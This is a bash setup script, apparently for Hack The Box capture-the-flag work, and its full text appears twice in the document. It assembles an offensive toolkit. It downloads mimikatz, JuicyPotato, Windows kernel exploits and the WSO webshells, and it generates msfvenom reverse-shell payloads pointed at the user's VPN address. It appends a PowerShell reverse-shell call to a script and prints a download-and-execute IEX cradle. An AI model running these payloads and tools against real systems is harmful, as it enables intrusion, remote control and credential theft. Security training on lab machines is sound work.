islanddog/setup.sh

## setup.sh
#!/bin/bash

htbip=`ifconfig tun0 | grep -w "inet" | awk '{print $2}'`

mkdir www
echo "--------------------------------------------"
echo -e "Script Running - \e[41mBecause I'm really lazy.\e[0m"
echo -e "Updated 11.02.2020"
echo -e "\e[0m--------------------------------------------"
echo "Current HTB IP - $htbip"
echo ""
#echo ""
#echo "[!] Install Pre-requisites[!]"
#sudo curl https://sh.rustup.rs -sSf | sh
#cargo install rustscan
#cargo install feroxbuster
#git clone https://github.com/danielmiessler/SecLists.git seclists
echo  -e "[\e[41mCreating One-liners & SSH Keys\e[0m]"
wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
mv Reverse\ Shell\ Cheatsheet.md rs.md
sed -i "s/10.0.0.1/$htbip/g" rs.md
ssh-keygen -t rsa -f id_rsa -q -P ""
cat id_rsa.pub
echo ""
echo -e "[\e[41mDownloading Enum Scripts.\e[0m]"
cd www
git clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries privesc
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite temp
git clone https://github.com/rebootuser/LinEnum temp
cd temp
find ./ -name '*.exe' -exec cp -prv '{}' '../privesc/' ';'
find ./ -name '*.sh' -exec cp -prv '{}' '../privesc/' ';'
find ./ -name '*.bat' -exec cp -prv '{}' '../privesc/' ';'
cd ..
rm -rf temp
cd privesc
rm -rf .git
wget https://gist.githubusercontent.com/islanddog/c77b4567e1569c185d40e2decf02ca63/raw/e9096bbba8d44de315a15cd28b2895ffec1cc6a7/echo-cscript
cd ..
echo ""
echo -e "[\e[41mPulling Windows Exploits\e[0m]"
git clone https://github.com/SecWiki/windows-kernel-exploits.git win-exploits
cd win-exploits
rm .git
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
cd ..
mkdir mimikatz
cd mimikatz
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip
unzip mimikatz_trunk.zip
rm -rf mimikatz_trunk.zip
cd ..
mkdir webshells
cd webshells
echo ""
echo -e "[\e[41mPulling WebShells\e[0m]"
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
echo Invoke-PowerShellTcp -Reverse -IPAddress $htbip -Port 1234 >> Invoke-PowerShellTcp.ps1
wget https://github.com/tennc/webshell/raw/master/aspx/wso.aspx
wget https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php
wget https://gist.githubusercontent.com/islanddog/f20e0ca0e9cef1d70110a8d781eeaa28/raw/4206911d39aaeed7306b701d5e1cc1d13cb54ffa/uploader.php
cd ..
mkdir shells
cd shells
echo ""
echo -e "[\e[41mCreating MSFVenom Shells\e[0m]"
msfvenom -p windows/shell_reverse_tcp LHOST=$htbip LPORT=1234 -x /usr/share/windows-binaries/nc.exe -k -f exe -o x86-1234.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$htbip LPORT=1234 -x /usr/share/windows-binaries/nc.exe -k -f exe -o x64-1234.exe
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$htbip LPORT=1234 -f war -o war-1234.war
msfvenom -p windows/shell/reverse_tcp LHOST=$htbip LPORT=1234 -f asp > shell-1234.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$htbip  LPORT=1234 -f raw > shell-1234.jsp
echo ""
echo -e "[\e[41mManual Download Required for Updates\e[0m]"
echo ""
echo "MimiKatz"
echo "https://github.com/gentilkiwi/mimikatz/releases/"
echo ""
echo "JuicyPotato"
echo "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
echo ""
echo -e "\e[41m[Quick Commands]\e[0m"
echo "ls /usr/share/webshells/webshells"
echo "ls /usr/share/windows-binaries/privesc"
echo "powershell IEX (New-Object Net.WebClient).DownloadString('http://$htbip/Invoke-PowerShellTcp.ps1"
echo "wget http://$htbip/"
echo "Requires cscript echo script - cscript wget.vbs http://$htbip/file.exe FILEYOUNEED"
echo "sudo smbserver.py -comment 'Transfer' www www"
echo "sudo python -m SimpleHTTPServer 80"
echo "./LinEnum.sh -s -r report -e /tmp/ -t"
echo "rustscan --ulimit 5000 10.10.10.63 -- -A -sC -sV --script 'default,vuln'"
echo ""
echo "done"
	#!/bin/bash

	htbip=`ifconfig tun0 \| grep -w "inet" \| awk '{print $2}'`

	mkdir www
	echo "--------------------------------------------"
	echo -e "Script Running - \e[41mBecause I'm really lazy.\e[0m"
	echo -e "Updated 11.02.2020"
	echo -e "\e[0m--------------------------------------------"
	echo "Current HTB IP - $htbip"
	echo ""
	#echo ""
	#echo "[!] Install Pre-requisites[!]"
	#sudo curl https://sh.rustup.rs -sSf \| sh
	#cargo install rustscan
	#cargo install feroxbuster
	#git clone https://github.com/danielmiessler/SecLists.git seclists
	echo -e "[\e[41mCreating One-liners & SSH Keys\e[0m]"
	wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
	mv Reverse\ Shell\ Cheatsheet.md rs.md
	sed -i "s/10.0.0.1/$htbip/g" rs.md
	ssh-keygen -t rsa -f id_rsa -q -P ""
	cat id_rsa.pub
	echo ""
	echo -e "[\e[41mDownloading Enum Scripts.\e[0m]"
	cd www
	git clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries privesc
	git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite temp
	git clone https://github.com/rebootuser/LinEnum temp
	cd temp
	find ./ -name '*.exe' -exec cp -prv '{}' '../privesc/' ';'
	find ./ -name '*.sh' -exec cp -prv '{}' '../privesc/' ';'
	find ./ -name '*.bat' -exec cp -prv '{}' '../privesc/' ';'
	cd ..
	rm -rf temp
	cd privesc
	rm -rf .git
	wget https://gist.githubusercontent.com/islanddog/c77b4567e1569c185d40e2decf02ca63/raw/e9096bbba8d44de315a15cd28b2895ffec1cc6a7/echo-cscript
	cd ..
	echo ""
	echo -e "[\e[41mPulling Windows Exploits\e[0m]"
	git clone https://github.com/SecWiki/windows-kernel-exploits.git win-exploits
	cd win-exploits
	rm .git
	wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
	cd ..
	mkdir mimikatz
	cd mimikatz
	wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip
	unzip mimikatz_trunk.zip
	rm -rf mimikatz_trunk.zip
	cd ..
	mkdir webshells
	cd webshells
	echo ""
	echo -e "[\e[41mPulling WebShells\e[0m]"
	wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
	echo Invoke-PowerShellTcp -Reverse -IPAddress $htbip -Port 1234 >> Invoke-PowerShellTcp.ps1
	wget https://github.com/tennc/webshell/raw/master/aspx/wso.aspx
	wget https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php
	wget https://gist.githubusercontent.com/islanddog/f20e0ca0e9cef1d70110a8d781eeaa28/raw/4206911d39aaeed7306b701d5e1cc1d13cb54ffa/uploader.php
	cd ..
	mkdir shells
	cd shells
	echo ""
	echo -e "[\e[41mCreating MSFVenom Shells\e[0m]"
	msfvenom -p windows/shell_reverse_tcp LHOST=$htbip LPORT=1234 -x /usr/share/windows-binaries/nc.exe -k -f exe -o x86-1234.exe
	msfvenom -p windows/x64/shell_reverse_tcp LHOST=$htbip LPORT=1234 -x /usr/share/windows-binaries/nc.exe -k -f exe -o x64-1234.exe
	msfvenom -p java/jsp_shell_reverse_tcp LHOST=$htbip LPORT=1234 -f war -o war-1234.war
	msfvenom -p windows/shell/reverse_tcp LHOST=$htbip LPORT=1234 -f asp > shell-1234.asp
	msfvenom -p java/jsp_shell_reverse_tcp LHOST=$htbip LPORT=1234 -f raw > shell-1234.jsp
	echo ""
	echo -e "[\e[41mManual Download Required for Updates\e[0m]"
	echo ""
	echo "MimiKatz"
	echo "https://github.com/gentilkiwi/mimikatz/releases/"
	echo ""
	echo "JuicyPotato"
	echo "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
	echo ""
	echo -e "\e[41m[Quick Commands]\e[0m"
	echo "ls /usr/share/webshells/webshells"
	echo "ls /usr/share/windows-binaries/privesc"
	echo "powershell IEX (New-Object Net.WebClient).DownloadString('http://$htbip/Invoke-PowerShellTcp.ps1"
	echo "wget http://$htbip/"
	echo "Requires cscript echo script - cscript wget.vbs http://$htbip/file.exe FILEYOUNEED"
	echo "sudo smbserver.py -comment 'Transfer' www www"
	echo "sudo python -m SimpleHTTPServer 80"
	echo "./LinEnum.sh -s -r report -e /tmp/ -t"
	echo "rustscan --ulimit 5000 10.10.10.63 -- -A -sC -sV --script 'default,vuln'"
	echo ""
	echo "done"